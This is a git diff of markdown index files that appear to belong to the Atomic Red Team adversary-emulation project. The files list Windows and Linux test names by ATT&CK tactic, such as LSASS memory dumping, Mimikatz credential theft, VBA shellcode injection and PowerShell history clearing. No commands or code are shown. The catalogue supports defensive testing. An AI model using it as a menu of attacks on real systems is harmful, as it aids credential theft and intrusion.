+ - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
+- [T1123 Audio Capture](../../T1123/T1123.md)
+ - Atomic Test #1: using device audio capture commandlet [windows]
+- [T1119 Automated Collection](../../T1119/T1119.md)
+ - Atomic Test #1: Automated Collection Command Prompt [windows]
+ - Atomic Test #2: Automated Collection PowerShell [windows]
+ - Atomic Test #3: Recon information for export with PowerShell [windows]
+ - Atomic Test #4: Recon information for export with Command Prompt [windows]
+- [T1115 Clipboard Data](../../T1115/T1115.md)
+ - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
+ - Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
+ - Atomic Test #4: Collect Clipboard Data via VBA [windows]
+- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
+ - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
+- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
+ - Atomic Test #2: PowerShell - Prompt User for Password [windows]
+- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
+ - Atomic Test #1: Input Capture [windows]
+- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
+ - Atomic Test #1: Stage data from Discovery.bat [windows]
+ - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
+- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md)
+ - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
+- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1113 Screen Capture](../../T1113/T1113.md)
+ - Atomic Test #5: Windows Screencapture [windows]
+- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
# privilege-escalation
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -19,7 +155,7 @@
- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md)
+- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
@@ -77,11 +213,14 @@
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
+- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
+ - Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
+ - Atomic Test #2: Shellcode execution via VBA [windows]
- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
@@ -95,6 +234,7 @@
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
+ - Atomic Test #5: Task Scheduler via VBA [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
@@ -137,7 +277,7 @@
- Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows]
- T1027.001 Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md)
+- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
@@ -153,6 +293,9 @@
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
+- [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
+ - Atomic Test #9: Prevent Powershell History Logging [windows]
+ - Atomic Test #10: Clear Powershell History by Deleting History File [windows]
- [T1070.001 Clear Windows Event Logs](../../T1070.001/T1070.001.md)
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: Delete System Logs Using Clear-EventLog [windows]
@@ -233,6 +376,7 @@
- Atomic Test #1: Hidden Window [windows]
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1562.003 Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -324,8 +468,10 @@
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
+ - Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
+ - Atomic Test #2: Shellcode execution via VBA [windows]
- [T1216.001 PubPrn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -372,6 +518,8 @@
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
- Atomic Test #4: InfDefaultInstall.exe .inf Execution [windows]
- Atomic Test #5: ProtocolHandler.exe Downloaded a Suspicious File [windows]
+ - Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
+ - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
@@ -397,7 +545,9 @@
- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1218.012 Verclsid [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1222.001 Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md)
- Atomic Test #1: Take ownership using takeown utility [windows]
@@ -501,6 +651,7 @@
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
@@ -515,6 +666,7 @@
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
+ - Atomic Test #5: Task Scheduler via VBA [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
@@ -766,56 +918,6 @@
- Atomic Test #2: Malicious User Agents - CMD [windows]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-# collection
-- [T1560 Archive Collected Data](../../T1560/T1560.md)
- - Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
-- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- - Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
- - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
-- [T1123 Audio Capture](../../T1123/T1123.md)
- - Atomic Test #1: using device audio capture commandlet [windows]
-- [T1119 Automated Collection](../../T1119/T1119.md)
- - Atomic Test #1: Automated Collection Command Prompt [windows]
- - Atomic Test #2: Automated Collection PowerShell [windows]
- - Atomic Test #3: Recon information for export with PowerShell [windows]
- - Atomic Test #4: Recon information for export with Command Prompt [windows]
-- [T1115 Clipboard Data](../../T1115/T1115.md)
- - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- - Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
-- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
-- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- - Atomic Test #2: PowerShell - Prompt User for Password [windows]
-- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- - Atomic Test #1: Input Capture [windows]
-- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- - Atomic Test #1: Stage data from Discovery.bat [windows]
- - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
-- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md)
- - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
-- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1113 Screen Capture](../../T1113/T1113.md)
- - Atomic Test #5: Windows Screencapture [windows]
-- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-
# execution
- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
@@ -865,6 +967,7 @@
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
+ - Atomic Test #5: Task Scheduler via VBA [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1569.002 Service Execution](../../T1569.002/T1569.002.md)
@@ -877,6 +980,7 @@
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
+ - Atomic Test #3: Extract Memory via VBA [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
@@ -906,87 +1010,6 @@
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-# credential-access
-- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
-- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- - Atomic Test #3: Extracting passwords with findstr [windows]
- - Atomic Test #4: Access unattend.xml [windows]
-- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- - Atomic Test #1: Run Chrome-password Collector [windows]
- - Atomic Test #3: LaZagne - Credentials from Browser [windows]
-- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
- - Atomic Test #1: Enumeration for Credentials in Registry [windows]
- - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
-- T1003.006 DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- - Atomic Test #2: PowerShell - Prompt User for Password [windows]
-- T1558.001 Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
- - Atomic Test #1: GPP Passwords (findstr) [windows]
- - Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
-- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md)
- - Atomic Test #1: Request for service tickets [windows]
-- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- - Atomic Test #1: Input Capture [windows]
-- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
- - Atomic Test #1: Dumping LSA Secrets [windows]
-- [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md)
- - Atomic Test #1: Windows Credential Editor [windows]
- - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows]
- - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows]
- - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
- - Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
- - Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
- - Atomic Test #7: LSASS read with pypykatz [windows]
-- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
- - Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows]
- - Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
- - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
- - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
- - Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
- - Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
-- [T1040 Network Sniffing](../../T1040/T1040.md)
- - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- - Atomic Test #4: Windows Internal Packet Capture [windows]
-- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- - Atomic Test #1: Powershell Mimikatz [windows]
- - Atomic Test #2: Gsecdump [windows]
- - Atomic Test #3: Credential Dumping with NPPSpy [windows]
-- [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
- - Atomic Test #1: Password Cracking with Hashcat [windows]
-- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- - Atomic Test #1: Install and Register Password Filter DLL [windows]
-- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
- - Atomic Test #1: Brute Force Credentials [windows]
-- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
- - Atomic Test #1: Password Spray all Domain Users [windows]
- - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
-- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- - Atomic Test #1: Private Keys [windows]
-- [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
- - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- - Atomic Test #2: Registry parse with pypykatz [windows]
- - Atomic Test #3: esentutl.exe SAM copy [windows]
- - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
-- T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-
# lateral-movement
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1021.003 Distributed Component Object Model](../../T1021.003/T1021.003.md)
diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md
index 24b3b88f..bbd79b46 100644
--- a/atomics/Indexes/Matrices/linux-matrix.md
+++ b/atomics/Indexes/Matrices/linux-matrix.md
@@ -1,53 +1,63 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
